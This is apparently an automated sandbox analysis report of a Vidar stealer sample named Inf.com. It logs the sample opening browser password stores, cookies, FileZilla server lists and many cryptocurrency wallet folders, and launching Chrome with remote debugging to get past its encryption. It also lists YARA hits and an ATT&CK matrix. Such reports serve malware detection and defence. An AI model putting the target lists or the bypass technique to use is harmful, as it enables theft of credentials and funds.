                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Inf.com, 0000000D.00000002.3268617637.000000000029C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Inf.comBinary or memory string: WIN_81
                Source: Inf.comBinary or memory string: WIN_XP
                Source: Name.9.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Inf.comBinary or memory string: WIN_XPe
                Source: Inf.comBinary or memory string: WIN_VISTA
                Source: Inf.comBinary or memory string: WIN_7
                Source: Inf.comBinary or memory string: WIN_8
                Source: Yara matchFile source: 0000000D.00000002.3268617637.00000000000F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3274095484.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Inf.com PID: 1276, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Attempt to bypass Chrome Application-Bound Encryption
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 13.2.Inf.com.f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000003.2418518687.0000000001529000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2418360409.0000000004761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3268617637.00000000000F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2418604420.00000000044E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2418255884.0000000004469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3274095484.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2418297625.0000000001505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000003.2418561056.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Inf.com PID: 1276, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A92263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,13_2_00A92263
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A91C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,13_2_00A91C61

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API                		2
                Valid Accounts                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol4
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Registry Run Keys / Startup Folder                		1
                Extra Window Memory Injection                		2
                Obfuscated Files or Information                		Security Account Manager3
                File and Directory Discovery                		SMB/Windows Admin Shares21
                Input Capture                		1
                Remote Access Software                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		1
                DLL Side-Loading                		NTDS26
                System Information Discovery                		Distributed Component Object Model3
                Clipboard Data                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                Extra Window Memory Injection                		LSA Secrets1
                Query Registry                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                Process Injection                		121
                Masquerading                		Cached Domain Credentials221
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                Registry Run Keys / Startup Folder                		2
                Valid Accounts                		DCSync1
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Virtualization/Sandbox Evasion                		Proc Filesystem4
